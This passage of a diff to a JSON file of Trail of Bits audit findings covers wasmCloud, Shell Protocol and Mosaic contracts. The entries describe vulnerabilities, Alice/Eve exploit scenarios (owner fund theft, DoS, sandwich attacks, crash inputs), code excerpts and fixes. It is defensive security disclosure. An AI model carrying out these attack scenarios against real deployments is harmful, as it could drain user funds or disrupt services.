investment strategy. Long term, take the following steps: Identify and implement one or more data structures that will reduce the technical debt resulting from the use of the InvestmentStrategy interface. Develop a more effective solution for covering withdrawals that does not consistently require withdrawing funds from other investment strategies.", + "title": "10. Lack of zero address check in functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. This issue affects the following contracts and functions: NFTXInventoryStaking.sol __NFTXInventoryStaking_init() NFTXSimpleFeeDistributor.sol setInventoryStakingAddress() addReceiver() changeReceiverAddress() RewardDistributionToken __RewardDistributionToken_init() Exploit Scenario Alice deploys a new version of the NFTXInventoryStaking contract. When she initializes the proxy contract, she inputs the zero address as the address of the _nftxVaultFactory state variable, leading to an incorrect initialization. Recommendations Short term, add zero-value checks on all function arguments to ensure that users cannot accidentally set incorrect values, misconfiguring the system. Long term, use Slither, which will catch functions that do not have zero checks.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3232,39 +5920,39 @@ ] }, { - "title": "26. 
MosaicVault and MosaicHolding owner is controlled by a single private key ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The MosaicVault and MosaicHolding contracts manage many critical functionalities, such as those for rescuing funds, managing liquidity, and claiming rewards. The owner of these contracts is a single externally owned account (EOA). As mentioned in TOB-CMP-20, this creates a single point of failure. Moreover, it makes the owner a high-value target for attackers and increases the incentives for the owner to act maliciously. If the private key is compromised, the system will be compromised too. Exploit Scenario Alice, the owner of the MosaicVault and MosaicHolding contracts, deploys the contracts. MosaicHolding eventually holds assets worth USD 20 million. Eve gains access to Alice's machine, upgrades the implementations, pauses MosaicHolding, and drains all funds from the contract. Recommendations Short term, change the owner of the contracts from a single EOA to a multi-signature account. Long term, take the following steps: Develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure. Assess the system's key management infrastructure and document the associated risks as well as an incident response plan.", + "title": "1. Out-of-bounds crash in extract_claims ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-09-wasmCloud-securityreview.pdf", + "body": "The strip_custom_section function does not sufficiently validate data and crashes when the range is not within the buffer (figure 1.1). The function is used in the extract_claims function and is given an untrusted input. In wasmCloud-otp, even though extract_claims is called as an Erlang NIF (Native Implemented Function) and potentially could bring down the VM upon crashing, the panic is handled gracefully by the Rustler library, resulting in an isolated crash of the Elixir process. if let Some((id, range)) = payload.as_section() { wasm_encoder::RawSection { id, data: &buf[range], } .append_to(&mut output); } Figure 1.1: wascap/src/wasm.rs#L161-L167 We found this issue by fuzzing the extract_claims function with cargo-fuzz (figure 1.2). #![no_main] use libfuzzer_sys::fuzz_target; use getrandom::register_custom_getrandom; // TODO: the program won't compile without this, why? fn custom_getrandom(buf: &mut [u8]) -> Result<(), getrandom::Error> { return Ok(()); } register_custom_getrandom!(custom_getrandom); fuzz_target!(|data: &[u8]| { let _ = wascap::wasm::extract_claims(data); }); Figure 1.2: A simple extract_claims fuzzing harness that passes the fuzzer-provided bytes straight to the function After fixing the issue (figure 1.3), we fuzzed the function for an extended period of time; however, we found no additional issues. if let Some((id, range)) = payload.as_section() { if range.end <= buf.len() { wasm_encoder::RawSection { id, data: &buf[range], } .append_to(&mut output); } else { return Err(errors::new(ErrorKind::InvalidCapability)); } } Figure 1.3: The fix we applied to continue fuzzing extract_claims. The code requires a new error value because we reused one of the existing ones that likely does not match the semantics. Exploit Scenario An attacker deploys a new module with invalid claims. While decoding the claims, the extract_claims function panics and crashes the Elixir process.
Recommendations Short term, fix the strip_custom_section function by adding the range check, as shown in figure 1.3. Add the extract_claims fuzzing harness to the wascap repository and run it for an extended period of time before each release of the library. Long term, add a fuzzing harness for each Rust function that processes user-provided data. References Erlang - NIFs", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "27. The relayer is a single point of failure ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Because the relayer is a centralized service that is responsible for critical functionalities, it constitutes a single point of failure within the Mosaic ecosystem. The relayer is responsible for the following tasks: Managing withdrawals across chains Managing transfers across chains Managing the accrued interest on all users' investments Executing cross-chain message call requests Collecting fees for all withdrawals, transfers, and cross-chain message calls Refunding fees in case of failed transfers or withdrawals The centralized design and importance of the relayer increase the likelihood that the relayer will be targeted by an attacker. Exploit Scenario Eve, an attacker, is able to gain root access on the server that runs the relayer. Eve can then shut down the Mosaic system by stopping the relayer service. Eve can also change the source code to trigger behavior that can lead to the drainage of funds. Recommendations Short term, document an incident response plan and monitor exposed ports and services that may be vulnerable to exploitation. Long term, arrange an external security audit of the core and peripheral relayer source code. Additionally, consider implementing a decentralized relayer architecture more resistant to system takeovers.", + "title": "2. Stack overflow while enumerating containers in blobstore-fs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-09-wasmCloud-securityreview.pdf", + "body": "The all_dirs function is vulnerable to a stack overflow caused by unbounded recursion, triggered by either the presence of circular symlinks inside the root of the blobstore (as configured during startup) or the presence of excessively nested directories inside the same. Because this function is used by FsProvider::list_containers, this issue would result in a denial of service for all actors that use the method exposed by affected blobstores. let mut subdirs: Vec<PathBuf> = Vec::new(); for dir in &dirs { let mut local_subdirs = all_dirs(prefix.join(dir.as_path()).as_path(), prefix); subdirs.append(&mut local_subdirs); } dirs.append(&mut subdirs); dirs Figure 2.1: capability-providers/blobstore-fs/src/fs_utils.rs#L24-L30 Exploit Scenario An attacker creates a circular symlink inside the storage directory. Alternatively, an attacker can, under the right circumstances, create successively nested directories with a sufficient depth to cause a stack overflow. blobstore.create_container(ctx, &\"a\".to_string()).await?; blobstore.create_container(ctx, &\"a/a\".to_string()).await?; blobstore.create_container(ctx, &\"a/a/a\".to_string()).await?; ... blobstore.create_container(ctx, &\"a/a/a/.../a/a/a\".to_string()).await?; blobstore.list_containers()
.await?; Figure 2.2: Possible attack on a vulnerable blobstore In practice, this attack requires the underlying file system to allow exceptionally long filenames, and we have not been able to produce a working attack payload. However, this does not prove that no such file systems exist or will exist in the future. Recommendations Short term, limit the allowable recursion depth to ensure that no stack overflow attack is possible given realistic stack sizes, as shown in figure 2.3. pub fn all_dirs(root: &Path, prefix: &Path, depth: i32) -> Vec<PathBuf> { if depth > 1000 { return vec![]; } ... // Now recursively go in all directories and collect all sub-directories let mut subdirs: Vec<PathBuf> = Vec::new(); for dir in &dirs { let mut local_subdirs = all_dirs(prefix.join(dir.as_path()).as_path(), prefix, depth + 1); subdirs.append(&mut local_subdirs); } dirs.append(&mut subdirs); dirs } Figure 2.3: Limiting the allowable recursion depth Long term, consider limiting the reliance on the underlying file system to a minimum by disallowing nesting containers. For example, Base64-encode all container and object names before passing them down to the file system routines. References OWASP Denial of Service Cheat Sheet (\"Input validation\" section)", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, { - "title": "4. Project dependencies contain vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Although dependency scans did not yield a direct threat to the project under review, npm and yarn audit identified dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the repositories under review. The output below details these issues. CVE ID", + "title": "3. Denial of service in blobstore-s3 using malicious actor ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-09-wasmCloud-securityreview.pdf", + "body": "The stream_bytes function continues looping until it detects that all of the available bytes have been sent. It does this based on the output of the send_chunk function, which reports the number of bytes that have been sent by the call. An attacker could send specially crafted responses that report that no errors were detected while also reporting that no bytes were sent, causing stream_bytes to continue looping indefinitely. while bytes_sent < bytes_to_send { let chunk_offset = offset + bytes_sent; let chunk_len = (self.max_chunk_size() as u64).min(bytes_to_send - bytes_sent); bytes_sent += self.send_chunk( ctx, Chunk { is_last: offset + chunk_len > end_range, bytes: bytes[bytes_sent as usize..(bytes_sent + chunk_len) as usize] .to_vec(), offset: chunk_offset as u64, container_id: bucket_id.to_string(), object_id: cobj.object_id.clone(), }, ) .await?; } Figure 3.1: capability-providers/blobstore-s3/src/lib.rs#L188-L204 Exploit Scenario An attacker can send a maliciously crafted request to get an object from a blobstore-s3 provider, then send successful responses without making actual progress in the transfer by reporting that empty-sized chunks were received.
Recommendations Make send_chunk report a failure if a zero-sized response is received.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "10. DoS risk created by cross-chain message call requests on certain networks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Cross-chain message calls that are requested on a low-fee, low-latency network could facilitate a DoS, preventing other users from interacting with the system. If a user, through the MsgSender contract, sent numerous cross-chain message call requests, the relayer would have to act upon the emitted events regardless of whether they were legitimate or part of a DoS attack. Exploit Scenario Eve creates a theoretically infinite series of transactions on Arbitrum, a low-fee, low-latency network. The internal queue of the relayer is then filled with numerous malicious transactions. Alice requests a cross-chain message call; however, because the relayer must handle many of Eve's transactions first, Alice has to wait an undefined amount of time for her transaction to be executed. Recommendations Short term, create multiple queues that work across the various chains to mitigate this DoS risk. Long term, analyze the implications of the ability to create numerous message calls on low-fee networks and its impact on relayer performance.", + "title": "4. Unexpected panic in validate_token ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-09-wasmCloud-securityreview.pdf", + "body": "The validate_token function from the wascap library panics with an out-of-bounds error when input is given in an unexpected format. The function expects the input to be a valid JWT token with three segments separated by dots (figure 4.1). This implicit assumption is satisfied in the code; however, the function is public and does not mention the assumption in its documentation. /// Validates a signed JWT. This will check the signature, expiration time, and not-valid-before time pub fn validate_token<T>(input: &str) -> Result<TokenValidation> where T: Serialize + DeserializeOwned + WascapEntity, { let segments: Vec<&str> = input.split('.').collect(); let header_and_claims = format!(\"{}.{}\", segments[0], segments[1]); let sig = base64::decode_config(segments[2], base64::URL_SAFE_NO_PAD)?; ... } Figure 4.1: wascap/src/jwt.rs#L612-L641 Exploit Scenario A developer uses the validate_token function expecting it to fully validate the token string. The function receives an untrusted malicious input that forces the program to panic. Recommendations Short term, add input format validation before accessing the segments and a test case with malformed input. Long term, always validate all inputs to functions or document the input assumptions if validation is not in place for a specific reason.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Low" ] }, { - "title": "12. Unimplemented getAmountsOut function in Balancer V2 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The getAmountsOut function in the BalancerV2Wrapper contract is unimplemented. The purpose of the getAmountsOut() function, shown in figure 12.1, is to allow users to know the amount of funds they will receive when executing a swap.
Because the function does not invoke any functions on the Balancer Vault, a user must actually perform a swap to determine the amount of funds he or she will receive: function getAmountsOut( address, address, uint256, bytes calldata ) external pure override returns (uint256) { return 0; } Figure 12.1: The getAmountsOut function in BalancerVaultV2Wrapper:43-50 Exploit Scenario Alice, a user of the Composable Finance vaults, wants to swap 100 USDC for DAI on Balancer. Because the getAmountsOut function is not implemented, she is unable to determine how much DAI she will receive before executing the swap. Recommendations Short term, implement the getAmountsOut function and have it call the queryBatchSwap function on the Balancer Vault. Long term, add unit tests for all functions to test all flows. Unit tests will detect incorrect function behavior.", + "title": "5. Incorrect error message when starting actor from file ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-09-wasmCloud-securityreview.pdf", + "body": "The error message logged when starting an actor from a file contains a string interpolation bug that causes the message to not include the fileref content (figure 5.1). This causes the error message to contain the literal string ${fileref} instead. It is worth noting that the fileref content will be included anyway as an attribute. Logger.error(\"Failed to read actor file from ${fileref}: #{inspect(err)}\", fileref: fileref) Figure 5.1: host_core/lib/host_core/actors/actor_supervisor.ex#L301 Recommendations Short term, change the error message to correctly interpolate the fileref string.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3272,9 +5960,9 @@ ] }, { - "title": "28. Lack of events for critical operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Several critical operations do not trigger events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. For example, the setRelayer function, which is called in the MosaicVault contract to set the relayer address, does not emit an event providing confirmation of that operation to the contract's caller (figure 28.1). function setRelayer(address _relayer) external override onlyOwner { relayer = _relayer; } Figure 28.1: The setRelayer() function in MosaicVault:80-82 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to take ownership of the MosaicVault contract. She then sets a new relayer address. Alice, a Composable Finance team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components.
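A sketch of the short-term recommendation applied to setRelayer (the event name and the surrounding contract are illustrative, not from the Mosaic codebase):

pragma solidity ^0.8.0;

// Sketch: every privileged state change emits an event so that off-chain
// monitoring can detect an unexpected relayer update.
contract VaultAdmin {
    event RelayerChanged(address indexed previousRelayer, address indexed newRelayer);

    address public owner = msg.sender;
    address public relayer;

    function setRelayer(address _relayer) external {
        require(msg.sender == owner, \"only owner\");
        emit RelayerChanged(relayer, _relayer);
        relayer = _relayer;
    }
}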
", + "title": "1. Denial-of-service conditions caused by the use of more than 256 slices ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "The owner of a Proteus-based automated market maker (AMM) can update the system parameters to cause a denial of service (DoS) upon the execution of swaps, withdrawals, and deposits. The Proteus AMM engine design supports the creation of an arbitrary number of slices. Slices are used to segment an underlying bonding curve and provide variable liquidity across that curve. The owner of a Proteus contract can update the number of slices by calling the _updateSlices function at any point. When a user requests a swap, deposit, or withdrawal operation, the Proteus contract first calls the _findSlice function (figure 1.1) to identify the slice in which it should perform the operation. The function iterates across the slices array and returns the index, i, of the slice that has the current ratio of token balances, m. function _findSlice(int128 m) internal view returns (uint8 i) { i = 0; while (i < slices.length) { if (m <= slices[i].mLeft && m > slices[i].mRight) return i; unchecked { ++i; } } // while loop terminates at i == slices.length // if we just return i here we'll get an index out of bounds. return i - 1; } Figure 1.1: The _findSlice() function in Proteus.sol#L1168-1179 However, the index, i, is defined as a uint8. If the owner sets the number of slices to at least 257 (by calling _updateSlices) and the current m is in the 257th slice, i will silently overflow, and the while loop will continue until an out-of-gas (OOG) exception occurs. If a deposit, withdrawal, or swap requires the 257th slice to be accessed, the operation will fail because the _findSlice function will be unable to reach that slice. Exploit Scenario Eve creates a seemingly correct Proteus-based primitive (one with only two slices near the asymptotes of the bonding curve). Alice deposits assets worth USD 100,000 into a pool. Eve then makes a deposit of X and Y tokens that results in a token balance ratio, m, of 1. Immediately thereafter, Eve calls _updateSlices and sets the number of slices to 257, causing the 256th slice to have an m of 1.01. Because the current m resides in the 257th slice, the _findSlice function will be unable to find that slice in any subsequent swap, deposit, or withdrawal operation. The system will enter a DoS condition in which all future transactions will fail. If Eve identifies an arbitrage opportunity on another exchange, Eve will be able to call _updateSlices again, use the unlocked curve to buy the token of interest, and sell that token on the other exchange for a pure profit. Effectively, Eve will be able to steal user funds. Recommendations Short term, change the index, i, from the uint8 type to uint256; alternatively, create an upper limit for the number of slices that can be created and ensure that i will not overflow when the _findSlice function searches through the slices array. Long term, consider adding a delay between a call to _updateSlices and the time at which the call takes effect on the bonding curve. This will allow users to withdraw from the system if they are unhappy with the new parameters. 
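A sketch of the short-term fix, adapted from the original in figure 1.1 (a uint256 index cannot wrap after 256 entries, so the loop always terminates):

// Sketch of the recommended fix: widen the index type to uint256.
function _findSlice(int128 m) internal view returns (uint256 i) {
    while (i < slices.length) {
        if (m <= slices[i].mLeft && m > slices[i].mRight) return i;
        unchecked { ++i; }
    }
    // The while loop terminates at i == slices.length; fall back to the
    // last slice, preserving the original function's behavior.
    return slices.length - 1;
}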
Additionally, consider making slices immutable after their construction; this will significantly reduce the risk of undefined behavior.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: Medium" ] }, { - "title": "5. Accrued interest is not attributable to the underlying investor on-chain ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "When an investor earns interest-bearing tokens by lending funds through Mosaic's investment strategies, the tokens are not directly attributed to the investor by on-chain data. The claim() function, which can be called only by the owner of the MosaicHolding contract, is defined in the contract and used to redeem interest-bearing tokens from protocols such as Aave and Compound (figure 5.1). function claim(address _investmentStrategy, bytes calldata _data) external override onlyAdmin validAddress(_investmentStrategy) { require(investmentStrategies[_investmentStrategy], \"ERR: STRATEGY NOT SET\"); address rewardTokenAddress = IInvestmentStrategy(_investmentStrategy).claimTokens(_data); emit TokenClaimed(_investmentStrategy, rewardTokenAddress); } Figure 5.1: The claim function in MosaicHolding:270-279 During the execution of claim(), the internal claimTokens() function calls into the AaveInvestmentStrategy, CompoundInvestmentStrategy, or SushiswapLiquidityProvider contract, which effectively transfers its balance of the interest-bearing token directly to the MosaicHolding contract. Figure 5.2 shows the claimTokens() function call in AaveInvestmentStrategy. function claimTokens(bytes calldata data) external override onlyInvestor returns (address) { address token = abi.decode(data, (address)); ILendingPool lendingPool = ILendingPool(lendingPoolAddressesProvider.getLendingPool()); DataTypes.ReserveData memory reserve = lendingPool.getReserveData(token); IERC20Upgradeable(reserve.aTokenAddress).safeTransfer( mosaicHolding, IERC20Upgradeable(reserve.aTokenAddress).balanceOf(address(this)) ); return reserve.aTokenAddress; } Figure 5.2: The claimTokens function in AaveInvestmentStrategy:58-68 However, there is no identifiable mapping or data structure attributing a percentage of those rewards to a given user. The off-chain relayer service is responsible for holding such mappings and rewarding users with the interest they have accrued upon withdrawal (see the relayer bot assumptions in the Project Coverage section). Exploit Scenario Investors Alice and Bob, who wish to earn interest on their idle USDC, decide to use the Mosaic system to provide loans. Mosaic invests their money in Aave's lending pool for USDC. However, there is no way for the parties to discern their ownership stakes in the lending pool through the smart contract logic. The owner of the contract decides to call the claim() function and redeem all aUSDC associated with Alice's and Bob's positions. When Bob goes to withdraw his funds, he has to trust that the relayer will send him his claim on the aUSDC without any on-chain verification. Recommendations Short term, consider implementing a way to identify the amount of each investor's stake in a given investment strategy. Currently, the relayer is responsible for tracking all rewards. 
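A minimal sketch of what such on-chain stake accounting could look like (a hypothetical contract; a real fix would need to integrate with MosaicHolding's strategy flows):

pragma solidity ^0.8.0;

// Sketch: track each investor's share of a strategy's interest-bearing
// tokens so that claims can be verified on-chain rather than trusted to
// the off-chain relayer.
contract StakeLedger {
    // strategy => investor => shares
    mapping(address => mapping(address => uint256)) public shares;
    // strategy => total shares outstanding
    mapping(address => uint256) public totalShares;

    function recordDeposit(address strategy, address investor, uint256 amount) internal {
        shares[strategy][investor] += amount;
        totalShares[strategy] += amount;
    }

    // The investor's claim on a reward balance, pro rata to their shares.
    function claimable(address strategy, address investor, uint256 rewardBalance)
        public
        view
        returns (uint256)
    {
        uint256 total = totalShares[strategy];
        return total == 0 ? 0 : (rewardBalance * shares[strategy][investor]) / total;
    }
}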
Long term, review the privileges and responsibilities of the relayer and architect a more robust solution for managing investments.", + "title": "2. LiquidityPoolProxy owners can steal user funds ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "The LiquidityPoolProxy contract implements the IOceanPrimitive interface and can integrate with the Ocean contract as a primitive. The proxy contract calls into an implementation contract to perform deposit, swap, and withdrawal operations (figure 2.1). function swapOutput(uint256 inputToken, uint256 inputAmount) public view override returns (uint256 outputAmount) { (uint256 xBalance, uint256 yBalance) = _getBalances(); outputAmount = implementation.swapOutput(xBalance, yBalance, inputToken == xToken ? 0 : 1, inputAmount); } Figure 2.1: The swapOutput() function in LiquidityPoolProxy.sol#L39-47 However, the owner of a LiquidityPoolProxy contract can perform the privileged operation of changing the underlying implementation contract via a call to setImplementation (figure 2.2). The owner could thus replace the underlying implementation with a malicious contract to steal user funds. function setImplementation(address _implementation) external onlyOwner { implementation = ILiquidityPoolImplementation(_implementation); } Figure 2.2: The setImplementation() function in LiquidityPoolProxy.sol#L28-33 This level of privilege creates a single point of failure in the system. It increases the likelihood that a contract's owner will be targeted by an attacker and incentivizes the owner to act maliciously. Exploit Scenario Alice deploys a LiquidityPoolProxy contract as an Ocean primitive. Eve gains access to Alice's machine and upgrades the implementation to a malicious contract that she controls. Bob attempts to swap USD 1 million worth of shDAI for shUSDC by calling computeOutputAmount. Eve's contract returns 0 for outputAmount. As a result, the malicious primitive's balance of shDAI increases by USD 1 million, but Bob does not receive any tokens in exchange for his shDAI. Recommendations Short term, document the functions and implementations that LiquidityPoolProxy contract owners can change. Additionally, split the privileges provided to the owner role across multiple roles to ensure that no one address has excessive control over the system. Long term, develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "6. User funds can become trapped in nonstandard token contracts ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "If a user's funds are transferred to a token contract that violates the ERC20 standard, the funds may become permanently trapped in that token contract. In the MsgReceiver contract, there are six calls to the transfer() function. See figure 6.1 for an example. 
function approveERC20TokenAndForwardCall( uint256 _feeAmount, address _feeToken, address _feeReceiver, address _token, uint256 _amount, bytes32 _id, address _contract, bytes calldata _data ) external payable onlyOwnerOrRelayer returns (bool success, bytes memory returnData) { require( IMsgReceiverFactory(msgReceiverFactory).whitelistedFeeTokens(_feeToken), \"Fee token is not whitelisted\" ); require(!forwarded[_id], \"call already forwared\"); //approve tokens to _contract IERC20(_token).safeIncreaseAllowance(_contract, _amount); // solhint-disable-next-line avoid-low-level-calls (success, returnData) = _contract.call{value: msg.value}(_data); require(success, \"Failed to forward function call\"); uint256 balance = IERC20(_feeToken).balanceOf(address(this)); require(balance >= _feeAmount, \"Not enough tokens for the fee\"); forwarded[_id] = true; IERC20(_feeToken).transfer(_feeReceiver, _feeAmount); } Figure 6.1: The approveERC20TokenAndForwardCall function in MsgReceiver:98- When implemented in accordance with the ERC20 standard, the transfer() function returns a boolean indicating whether a transfer operation was successful. However, tokens that implement the ERC20 interface incorrectly may not return true upon a successful transfer, in which case the transaction will revert and the user's funds will be locked in the token contract. Exploit Scenario Alice, the owner of the MsgReceiverFactory contract, adds a fee token that is controlled by Eve. Eve's token contract incorrectly implements the ERC20 interface. Bob interacts with MsgReceiver and calls a function that executes a transfer to _feeReceiver, which is controlled by Eve. Because Eve's fee token contract does not provide a return value, Bob's transfer reverts. Recommendations Short term, use safeTransfer() for token transfers and use the SafeERC20 library for interactions with ERC20 token contracts. Long term, develop a process for onboarding new fee tokens. Review our Token Integration Checklist for guidance on the onboarding process. References Missing Return Value Bug", + "title": "3. Risk of sandwich attacks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "The Proteus liquidity pool implementation does not use a parameter to prevent slippage. Without such a parameter, there is no guarantee that users will receive any tokens in a swap. The LiquidityPool contract's computeOutputAmount function returns an outputAmount value indicating the number of tokens a user should receive in exchange for the inputAmount. Many AMM protocols enable users to specify the minimum number of tokens that they would like to receive in a swap. This minimum number of tokens (indicated by a slippage parameter) protects users from receiving fewer tokens than expected. As shown in figure 3.1, the computeOutputAmount function signature includes a 32-byte metadata field that would allow a user to encode a slippage parameter. function computeOutputAmount( uint256 inputToken, uint256 outputToken, uint256 inputAmount, address userAddress, bytes32 metadata ) external override onlyOcean returns (uint256 outputAmount) { Figure 3.1: The signature of the computeOutputAmount() function in LiquidityPool.sol#L192-198 However, this field is not used in swaps (figure 3.2) and thus does not provide any protection against excessive slippage. By using a bot to sandwich a user's trade, an attacker could increase the slippage incurred by the user and profit off of the spread at the user's expense. 
function computeOutputAmount( uint256 inputToken, uint256 outputToken, uint256 inputAmount, address userAddress, bytes32 metadata ) external override onlyOcean returns (uint256 outputAmount) { ComputeType action = _determineComputeType(inputToken, outputToken); [...] } else if (action == ComputeType.Swap) { // Swap action + computeOutput context => swapOutput() outputAmount = swapOutput(inputToken, inputAmount); emit Swap( inputAmount, outputAmount, metadata, userAddress, (inputToken == xToken), true ); } [...] Figure 3.2: Part of the computeOutputAmount() function in LiquidityPool.sol#L192-260 Exploit Scenario Alice wishes to swap her shUSDC for shwETH. Because the computeOutputAmount function's metadata field is not used in swaps to prevent excessive slippage, the trade can be executed at any price. As a result, when Eve sandwiches the trade with a buy and sell order, Alice sells the tokens without purchasing any, effectively giving away tokens for free. Recommendations Short term, document the fact that protocols that choose to use the Proteus AMM engine should encode a slippage parameter in the metadata field. The use of this parameter will reduce the likelihood of sandwich attacks against protocol users. Long term, ensure that all calls to computeOutputAmount and computeInputAmount use slippage parameters when necessary, and consider relying on an oracle to ensure that the amount of slippage that users can incur in trades is appropriately limited.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", - "Difficulty: High" + "Difficulty: Medium" ] }, { - "title": "13. Use of MsgReceiver to check _feeToken status leads to unnecessary gas consumption ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Checking the whitelist status of a token only on the receiving end of a message call can lead to excessive gas consumption. As part of a cross-chain message call, all functions in the MsgReceiver contract check whether the token used for the payment to _feeReceiver ( _feeToken ) is a whitelisted token (figure 13.1). Tokens are whitelisted by the owner of the MsgReceiverFactory contract. function approveERC20TokenAndForwardCall( uint256 _feeAmount, address _feeToken, address _feeReceiver, address _token, uint256 _amount, bytes32 _id, address _contract, bytes calldata _data ) external payable onlyOwnerOrRelayer returns (bool success, bytes memory returnData) { require( IMsgReceiverFactory(msgReceiverFactory).whitelistedFeeTokens(_feeToken), \"Fee token is not whitelisted\" ); require(!forwarded[_id], \"call already forwared\"); //approve tokens to _contract IERC20(_token).safeIncreaseAllowance(_contract, _amount); // solhint-disable-next-line avoid-low-level-calls (success, returnData) = _contract.call{value: msg.value}(_data); require(success, \"Failed to forward function call\"); uint256 balance = IERC20(_feeToken).balanceOf(address(this)); require(balance >= _feeAmount, \"Not enough tokens for the fee\"); forwarded[_id] = true; IERC20(_feeToken).transfer(_feeReceiver, _feeAmount); } Figure 13.1: The approveERC20TokenAndForwardCall function in MsgReceiver:98-123 This validation should be performed before the MsgSender contract emits the related event (figure 13.2). This is because the relayer will act upon the emitted event on the receiving chain regardless of whether _feeToken is set to a whitelisted token. 
function registerCrossFunctionCallWithTokenApproval( uint256 _chainId, address _destinationContract, address _feeToken, address _token, uint256 _amount, bytes calldata _methodData ) external override nonReentrant onlyWhitelistedNetworks(_chainId) onlyUnpausedNetworks(_chainId) whenNotPaused { bytes32 id = _generateId(); //shouldn't happen require(hasBeenForwarded[id] == false, \"Call already forwarded\"); require(lastForwardedCall != id, \"Forwarded last time\"); lastForwardedCall = id; hasBeenForwarded[id] = true; emit ForwardCallWithTokenApproval( msg.sender, id, _chainId, _destinationContract, _feeToken, _token, _amount, _methodData ); } Figure 13.2: The registerCrossFunctionCallWithTokenApproval function in MsgSender:169-203 Exploit Scenario On Arbitrum, a low-fee network, Eve creates a theoretically infinite series of transactions to be sent to MsgSender, with _feeToken set to a token that she knows is not whitelisted. The relayer relays the series of message calls to a MsgReceiver contract on Ethereum, a high-fee network, and all of the transactions revert. However, the relayer has to pay the intrinsic gas cost for each transaction, with no repayment, while allowing its internal queue to be filled up with malicious transactions. Recommendations Short term, move the logic for token whitelisting and validation to the MsgSender contract. Long term, analyze the implications of the ability to create numerous message calls on low-fee networks and its impact on relayer performance.", + "title": "4. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "Although dependency scans did not identify a direct threat to the project under review, npm and yarn audit identified dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the repository under review. The output below details these issues: CVE ID", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", - "Difficulty: Medium" + "Difficulty: Low" ] }, { - "title": "14. Active liquidity providers can set arbitrary _tokenOut values when withdrawing liquidity ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "An active liquidity provider (LP) can move his or her liquidity into any token, even one that the LP controls. When a relayer acts upon a WithdrawRequest event triggered by an active LP, the MosaicVault contract checks only that the address of _tokenOut (the token being requested) is not the zero address (figure 14.1). Outside of that constraint, _tokenOut can effectively be set to any token, even one that might have vulnerabilities. function _withdraw( address _accountTo, uint256 _amount, address _tokenIn, address _tokenOut, uint256 _amountOutMin, WithdrawData calldata _withdrawData, bytes calldata _data ) internal onlyWhitelistedToken(_tokenIn) validAddress(_tokenOut) nonReentrant onlyOwnerOrRelayer whenNotPaused returns (uint256 withdrawAmount) Figure 14.1: The signature of the _withdraw function in MosaicVault:404-419 This places the burden of ensuring the swap's success on the decentralized exchange, and, as the application grows, can lead to unintended code behavior. 
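One possible tightening, sketched below, is to subject _tokenOut to the same whitelist as _tokenIn (a sketch only; whether such a restriction is appropriate is exactly the design question this finding asks the team to analyze):

// Sketch: apply the existing whitelist modifier to the output token as well.
function _withdraw(
    address _accountTo,
    uint256 _amount,
    address _tokenIn,
    address _tokenOut,
    uint256 _amountOutMin,
    WithdrawData calldata _withdrawData,
    bytes calldata _data
)
    internal
    onlyWhitelistedToken(_tokenIn)
    onlyWhitelistedToken(_tokenOut) // instead of only validAddress(_tokenOut)
    nonReentrant
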